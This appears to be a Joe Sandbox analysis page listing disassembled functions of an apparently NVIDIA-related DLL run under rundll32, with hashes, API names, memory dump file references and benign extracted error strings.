                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLocalProc$AllocDirectoryFreeSystem$LibraryLoad
                                                                                                                                  • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsW$SetupDiGetDeviceInterfaceDetailW$Setupapi.dll$VEN_10DE
                                                                                                                                  • API String ID: 3259344501-2772812945
                                                                                                                                  • Opcode ID: 7c644d129dc48527469084b3c10780ee942e85d54860aab42b046474c5722e56
                                                                                                                                  • Instruction ID: 3ab0591a65c5bd6e225ffc7273c6b3fa11600769368539a83bbbd86f669c09f4
                                                                                                                                  • Opcode Fuzzy Hash: 7c644d129dc48527469084b3c10780ee942e85d54860aab42b046474c5722e56
                                                                                                                                  • Instruction Fuzzy Hash: 7D915926B19B4286FB60CFA1B8743A833A9BB48789F445539DE4DA2B54EF3CE5149340
                                                                                                                                  Function 00007FFD92DC5890 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 220COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                  • String ID: %s: Not able to create communication event, error - %x$%s: Not able to create done event, error - %x$%s: Not able to create initialize event, error - %x$%s: Not able to create pending event, error - %x$CNvVideoTranscode::InitializeForTranscode
                                                                                                                                  • API String ID: 545576003-2512211399
                                                                                                                                  • Opcode ID: 0d6106a9cdd94714d348079f01c4fa2d53b6e87335efbfb1ddaa6cc34244b657
                                                                                                                                  • Instruction ID: 72513e24892f2a3d2dd0c3d0a14655c06e10678f2a916c98cc96a7505dbbb1ae
                                                                                                                                  • Opcode Fuzzy Hash: 0d6106a9cdd94714d348079f01c4fa2d53b6e87335efbfb1ddaa6cc34244b657
                                                                                                                                  • Instruction Fuzzy Hash: 48B13836B05B429AFB74CFA4E4A02EC3379FF48749B405136DA5E53A68EE78E615C340
                                                                                                                                  Function 00007FFD92DBDAB0 Relevance: 18.1, APIs: 4, Strings: 6, Instructions: 589synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mutex$CloseCreateHandleObjectReleaseSingleWait
                                                                                                                                  • String ID: $%s=%s$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$NGXLoadConfig$[%s]$ngx_update_api
                                                                                                                                  • API String ID: 1910114929-880810353
                                                                                                                                  • Opcode ID: 075cdb4441c61e6bf80836c15d5a1196d102c34f28cb2f8047a233887277c383
                                                                                                                                  • Instruction ID: 170c55780edf5b47c0c3e17b59ed560eafe2a05e0f68696d039878402aea748d
                                                                                                                                  • Opcode Fuzzy Hash: 075cdb4441c61e6bf80836c15d5a1196d102c34f28cb2f8047a233887277c383
                                                                                                                                  • Instruction Fuzzy Hash: 3B429E32B09B4281FA24CF91E4A47B927A4FB84B85F59463AEE4E17B94DF7DE440D340
                                                                                                                                  Function 00007FFD92DC60E0 Relevance: 16.9, Strings: 13, Instructions: 651COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - Alpha bitmap not initialized, Possible end of all image params$%s - Alpha bitmap not ready for blend$%s - CreateBitmapFromWicBitmap failed with %x error$%s - CreateFormatConverter failed with %x error,$%s - Null BlendInfo struct passed$CNVDirectBlend::doBlend$CreateBitmap failed with %x error$EndDraw failed with %x error$Not able to create Wic Bitmap from pixel data, error - %x$W$blendEffect->SetValue failed with %x error$initializeAlphaBitmap failed with %x error$initializeAlphaBitmapForImageParams returned %x error - possibly image already handled
                                                                                                                                  • API String ID: 0-3293017823
                                                                                                                                  • Opcode ID: 6da85f80007a666535686e7fea357e1d663827dd3bed96efab637dae95e61e3d
                                                                                                                                  • Instruction ID: 0a719156c68fb080a04db1d66de0fe7cd1544887d493a6c1a809d81490b9ea34
                                                                                                                                  • Opcode Fuzzy Hash: 6da85f80007a666535686e7fea357e1d663827dd3bed96efab637dae95e61e3d
                                                                                                                                  • Instruction Fuzzy Hash: C7426B72B08B4686FB24CFA9D4A02AD23A5FB89B89F105136CE9D57B64CF7DE045D340
                                                                                                                                  Function 00007FFD92DB8CC0 Relevance: 14.6, Strings: 11, Instructions: 807COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %hs: Not able to open input file - %ls, returning error$%hs:Couldnt load the json string - %ls into a Json object$%hs:Couldnt parse the json, Not a valid json file- %ls$%hs:FinalizeParams failed, error - %x, possibly memory allocation or inconsistent json file, returning error$%hs:GetExtendedParams failed, possibly wrong json or unsupported params, returning error$%hs:GetInputParams failed, possibly wrong or unsupported input params, returning error$%hs:GetOutputParams failed, possibly wrong or unsupported output params, returning error$%hs:Length of bytes read - %x not equal to length of the file- %x, might get parsing error$CNvJsonMontageConfig::parseConfigFileForMontageParams$GetSize() >= count * sizeof(T)$c:\dvs\p4\build\sw\tools\rapidjson\1.0.2\include\rapidjson\internal/stack.h
                                                                                                                                  • API String ID: 0-3493570970
                                                                                                                                  • Opcode ID: f4f6826c6d053448694c472d3d6097a3f538654ab3a059c9b4d163a941324ca2
                                                                                                                                  • Instruction ID: 9bcb832f4a51a188da78c61e5e34ff57a8d732328bce58bbd4f4e899bd4c3c6e
                                                                                                                                  • Opcode Fuzzy Hash: f4f6826c6d053448694c472d3d6097a3f538654ab3a059c9b4d163a941324ca2
                                                                                                                                  • Instruction Fuzzy Hash: 1B429E36B08B4681FA21DFA9D4A02B973A9FB84B85F54413ADE4D07B95DFBDE441C340
                                                                                                                                  Function 00007FFD92DBAF90 Relevance: 14.5, APIs: 3, Strings: 4, Instructions: 2258COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy_s
                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                  • API String ID: 1502251526-2761157908
                                                                                                                                  • Opcode ID: 34e11c9f84e5e463ac7eaf1eeb4a84143be7e7249a50f5aeb2146af9e4a983aa
                                                                                                                                  • Instruction ID: e085f874d4cf1ffdf4fda5d15b1111ccdc6b3676ca7c6936e5590aa442a05437
                                                                                                                                  • Opcode Fuzzy Hash: 34e11c9f84e5e463ac7eaf1eeb4a84143be7e7249a50f5aeb2146af9e4a983aa
                                                                                                                                  • Instruction Fuzzy Hash: BFB21972B081928BF7368EA6D4647FD37A1FB44799F105235DA0A57B88DFB8E5088B40
                                                                                                                                  Function 00007FFD92DBB090 Relevance: 12.9, Strings: 10, Instructions: 352COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - Null Composition struct passed$%s - Size, Dest Buffer, width - %x, height - %x$%s - Size, First Buffer, width = %x, Height - %x, Second Buffer, width - %x, height - %x$%s - blendEffect->SetValue failed with %x error$CNVDirectBlend::doComposition$CreateBitmap failed with %x error$EndDraw failed with %x error$Not able to create D2D Bitmap from first buffer$Not able to create D2D Bitmap from second buffer$W
                                                                                                                                  • API String ID: 0-2924177856
                                                                                                                                  • Opcode ID: bccf47d484bdfb6e520c1373e29fc4e0be2e39b12ff9382d63a9be05228cfbde
                                                                                                                                  • Instruction ID: f400597b0eaed67dc17e99af344da1d90d4ab4e2c344a6b0b60edf0b251b6a16
                                                                                                                                  • Opcode Fuzzy Hash: bccf47d484bdfb6e520c1373e29fc4e0be2e39b12ff9382d63a9be05228cfbde
                                                                                                                                  • Instruction Fuzzy Hash: F2028C36B09B4582EB20DFAAE4A02A97374FB89B89F019136DF9D13B64DF79D404D700
                                                                                                                                  Function 00007FFD92DBB780 Relevance: 11.5, Strings: 8, Instructions: 1506COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - HandleBitmapOperation failed with %x error$%s: HandleSharedSurfaceBltForEncode failed for source surface from D2D bitmap, error - %x $%s: Invalid or Null ID2D1Bitmap1 ptr passed $%s: Not able to retrieve IDXGISurface from ID2D1Bitmap1$%s: Surface didnt return a QI to a ID3D11Texture2D surface $CNVMultiEncodeCompositor::HandleBlendForMultiVideoEncode$CNVMultiEncodeCompositor::HandleD2DBitmapBlt$yxxxxxxx
                                                                                                                                  • API String ID: 0-2934646955
                                                                                                                                  • Opcode ID: 964e0b20a05555755719c54e46e544a5fb14b9e9d4261dad1afb13305ffd8ad0
                                                                                                                                  • Instruction ID: 2c508e8be3edc7d6c8970eeeaad0da5e7b38ad8f74d02f218e89f87a02d15daf
                                                                                                                                  • Opcode Fuzzy Hash: 964e0b20a05555755719c54e46e544a5fb14b9e9d4261dad1afb13305ffd8ad0
                                                                                                                                  • Instruction Fuzzy Hash: 7F72AF66B08B8582EB20CF69D4943AD7764FB98BC8F019236DE8D177A5DF79E185C300
                                                                                                                                  Function 00007FFD92DB3260 Relevance: 10.7, APIs: 7, Instructions: 172COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$CodeInfoPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2191266518-0
                                                                                                                                  • Opcode ID: 7161c4c073c619cc4f129a55f6de4c8bf5d416bdf22814918288a3d7024a389d
                                                                                                                                  • Instruction ID: 72720705bb360b1f08512ce00df8a47717cdd613de19fcc6db536b35f0b15d2e
                                                                                                                                  • Opcode Fuzzy Hash: 7161c4c073c619cc4f129a55f6de4c8bf5d416bdf22814918288a3d7024a389d
                                                                                                                                  • Instruction Fuzzy Hash: C3719C22B1860289FF729FA2D8606FE32B4BF45765F444236CA1D57A85DFBCA845C350
                                                                                                                                  Function 00007FFD92DBEB00 Relevance: 9.3, Strings: 7, Instructions: 572COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
